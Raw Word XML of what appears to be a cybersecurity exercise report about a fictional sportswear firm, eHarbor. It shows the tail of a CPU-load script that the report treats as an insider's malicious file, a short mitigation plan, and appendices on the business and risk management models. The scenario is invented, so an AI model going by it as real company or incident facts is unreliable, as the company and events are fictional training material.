    <w:p w14:paraId="524EC45F" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0487B" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if len(sys.argv) != 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B795399" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print("Usage: python script_name.py &lt;interval&gt; &lt;utilization&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78890845" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F2A4A" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD63007" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interval = float(sys.argv[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD3989" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utilization = float(sys.argv[2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20951111" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFD9776" w14:textId="2DDAB51F" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generate_cpu_load(interval, utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A632B45" w14:textId="097FDB13" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE156D6" w14:textId="3E36069F" w:rsidR="005E235D" w:rsidRPr="001E6962" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6962">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation plan: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9ABED" w14:textId="77777777" w:rsidR="007F613A" w:rsidRDefault="007F613A" w:rsidP="007F613A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kill process and remove the malicious file</w:t>
      </w:r>
      <w:r w:rsidR="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188CAB69" w14:textId="6F53FC77" w:rsidR="005E235D" w:rsidRPr="007F613A" w:rsidRDefault="007F613A" w:rsidP="007F613A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agree d</w:t>
      </w:r>
      <w:r w:rsidRPr="007F613A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isciplinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> actions for internal employee. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720AC51" w14:textId="4DABDF4A" w:rsidR="007D7C84" w:rsidRPr="008E74AB" w:rsidRDefault="00BC1473" w:rsidP="007D7C84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6A8E824C" w14:textId="2F4DCF91" w:rsidR="007D7C84" w:rsidRPr="006E26F6" w:rsidRDefault="007D7C84" w:rsidP="007D7C84">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="007D7C84" w:rsidRPr="006E26F6" w:rsidSect="00964D12">
          <w:headerReference w:type="even" r:id="rId15"/>
          <w:headerReference w:type="default" r:id="rId16"/>
          <w:footerReference w:type="default" r:id="rId17"/>
          <w:headerReference w:type="first" r:id="rId18"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778C4FAA" w14:textId="61C75212" w:rsidR="00AB2429" w:rsidRDefault="003737E7" w:rsidP="008626F5">
      <w:pPr>
        <w:pStyle w:val="Appendicesheading"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc163900522"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix A - </w:t>
      </w:r>
      <w:r w:rsidR="00870D5F">
        <w:t>Business Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="52E642E6" w14:textId="77777777" w:rsidR="001A26B4" w:rsidRDefault="001A26B4" w:rsidP="00E674B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc163900523"/>
      <w:r w:rsidRPr="006E26F6">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1B6D68B4" w14:textId="41DE280B" w:rsidR="00A34460" w:rsidRDefault="00C265DE" w:rsidP="00A34460">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E12CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eHarbor is a Funnish c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ompany best known for its sustainable and ethically manufactured active wear. Its product portfolio centered around </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0C01">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>athletic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> apparel is supported by fitness equipment and watches.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F568BF2" w14:textId="77777777" w:rsidR="00A34460" w:rsidRDefault="00A34460" w:rsidP="00A34460">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc163900524"/>
      <w:r>
        <w:t>Revenue generating model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="16842489" w14:textId="302FCF1C" w:rsidR="00C13D15" w:rsidRDefault="00C13D15" w:rsidP="00C13D15">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eCommerce uses a third-party manufacturer for producing its products based on the research and development done internally.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91FAC9" w14:textId="3AC3BF99" w:rsidR="00C13D15" w:rsidRDefault="00C13D15" w:rsidP="00C13D15">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor operates in both business to consumer and business to business model. It does not have brick-and-mortar stores, but its products are sold by most sporting goods retailers in Funland. The B2C is operated through eHarbor’s own eCommerce site. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA39799" w14:textId="269874D9" w:rsidR="00C13D15" w:rsidRPr="00C13D15" w:rsidRDefault="00C13D15" w:rsidP="00C13D15">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the past, the revenue generated from B2C and B2B was somewhat even. The recent geopolitical uncertainties have increased the importance of the B2C-channel. eHarbor has released a new series of radiant resistant</w:t>
      </w:r>
      <w:r w:rsidRPr="00B009FA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tactical yoga pants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is currently only available through their webstore.     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A950C" w14:textId="77777777" w:rsidR="00E633FD" w:rsidRDefault="00E633FD" w:rsidP="00E633FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc163900525"/>
      <w:r>
        <w:t>Main processes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0DD8021E" w14:textId="77777777" w:rsidR="003A18FB" w:rsidRPr="00F02F92" w:rsidRDefault="003A18FB" w:rsidP="003A18FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Whereas eHarbor’s revenue generating processes are research and development and </w:t>
      </w:r>
      <w:r w:rsidRPr="008D39FA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B2C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/B sales, the functions supporting these are seen as key for the eHarbor’s success. These are IT, Communications, HR and Legal.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D04A5" w14:textId="77777777" w:rsidR="00BA3DAB" w:rsidRDefault="00BA3DAB" w:rsidP="00BA3DAB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00BA3DAB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435D8717" wp14:editId="7B33EA8B">
            <wp:extent cx="4562475" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="81729665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4D09D909" w14:textId="70946740" w:rsidR="003A18FB" w:rsidRPr="003243CB" w:rsidRDefault="00BA3DAB" w:rsidP="00BA3DAB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003243CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003243CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D5567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003243CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: eHarbor's organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73CB6B" w14:textId="77777777" w:rsidR="006F62F2" w:rsidRPr="002E37D7" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E37D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129ADE40" w14:textId="65B17769" w:rsidR="006F62F2" w:rsidRDefault="006F62F2" w:rsidP="006F62F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eHarbor’s IT department’s core functions are to securely m</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6739">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">aintain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and develop </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6739">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the internal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IT services provided to eHarbor employees and the eHarbor webstore</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6739">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The function includes 1</w:t>
      </w:r>
      <w:r w:rsidR="003243CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT and cybersecurity professionals who work in close collaboration with their outsourced SOC service provider CyberFence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF0E0" w14:textId="77777777" w:rsidR="006F62F2" w:rsidRPr="002E37D7" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E37D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349B4B2" w14:textId="51E93BCE" w:rsidR="006F62F2" w:rsidRDefault="006F62F2" w:rsidP="006F62F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The communications department is responsible for internal and external communications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5DFA3" w14:textId="77777777" w:rsidR="006F62F2" w:rsidRPr="002E37D7" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E37D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HR &amp; Legal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097EF03" w14:textId="518FB2B7" w:rsidR="006F62F2" w:rsidRDefault="006F62F2" w:rsidP="006F62F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The function is concerned with all things related to human resources and legal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB92AB8" w14:textId="77777777" w:rsidR="006F62F2" w:rsidRPr="002E37D7" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E37D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEE500" w14:textId="07AA7AC7" w:rsidR="006F62F2" w:rsidRDefault="006F62F2" w:rsidP="006F62F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Supply Chain function is responsible for managing eHarbor’s supply chain all the way from research and development to its customer’s wardrobe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235302E" w14:textId="77777777" w:rsidR="006F62F2" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="6"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sales &amp; marketing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854141D" w14:textId="2FEFF6FD" w:rsidR="00C265DE" w:rsidRDefault="006F62F2" w:rsidP="00E970C7">
      <w:pPr>
        <w:ind w:firstLine="6"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Sales department is responsible for B2C/B sales as well as customer services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C4364" w14:textId="77777777" w:rsidR="009A0F43" w:rsidRDefault="009A0F43">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="009A0F43" w:rsidSect="00964D12">
          <w:headerReference w:type="even" r:id="rId24"/>
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:headerReference w:type="first" r:id="rId27"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7565FA3A" w14:textId="2E175E75" w:rsidR="00870D5F" w:rsidRDefault="004166B0" w:rsidP="00870D5F">
      <w:pPr>
        <w:pStyle w:val="Appendicesheading"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc163900526"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix B - </w:t>
      </w:r>
      <w:r w:rsidR="00870D5F">
        <w:t>Risk Management Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="562ABA1A" w14:textId="31795BA2" w:rsidR="006E2AB3" w:rsidRDefault="005D0909" w:rsidP="006E2AB3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The risk management mode</w:t>
      </w:r>
      <w:r w:rsidR="00953FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l of eHarbor consisted of</w:t>
      </w:r>
      <w:r w:rsidR="009F70BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple activities summarized below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A29DB" w14:textId="301F5C17" w:rsidR="006E2AB3" w:rsidRPr="0087503A" w:rsidRDefault="0087503A" w:rsidP="0087503A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087503A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E2AB3" w:rsidRPr="0087503A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Assigning business criticality to the systems and services maintained by eHarbor. </w:t>
      </w:r>
      <w:r w:rsidR="00771C27" w:rsidRPr="0087503A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The criticality reflected the scenario. The outcome is introduced in the fourth chapter of the Incident Response Plan (Appendix C). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629AC9B1" w14:textId="639A9F86" w:rsidR="00D278E0" w:rsidRDefault="0087503A" w:rsidP="006E2AB3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00771C27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="009A0088">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>general risk analysis</w:t>
      </w:r>
      <w:r w:rsidR="00312B77">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure 1)</w:t>
      </w:r>
      <w:r w:rsidR="009A0088">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The full risk assessment is stored in eHarbor-Excel</w:t>
      </w:r>
      <w:r w:rsidR="00001FDD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> located in BT2 – eHarbor Teams-channel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CCD7F3" w14:textId="77777777" w:rsidR="00312B77" w:rsidRDefault="00D278E0" w:rsidP="00312B77">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D278E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32DFB2B9" wp14:editId="50DEAF74">
            <wp:extent cx="6120130" cy="78033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120130" cy="780339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85342F" w14:textId="62F3D913" w:rsidR="00312B77" w:rsidRPr="009F70BC" w:rsidRDefault="00312B77" w:rsidP="00312B77">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F70BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 1: Some parts of the risk analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C8813" w14:textId="0EDC3B2F" w:rsidR="009F70BC" w:rsidRPr="009F70BC" w:rsidRDefault="0087503A" w:rsidP="009F70BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00207C51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability scans were conducted </w:t>
      </w:r>
      <w:r w:rsidR="00F65EE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with Nessus for all assets. The results were analyzed by server owners. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144F5C6" w14:textId="4DB3ABA6" w:rsidR="00771C27" w:rsidRPr="006E2AB3" w:rsidRDefault="009A0088" w:rsidP="006E2AB3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
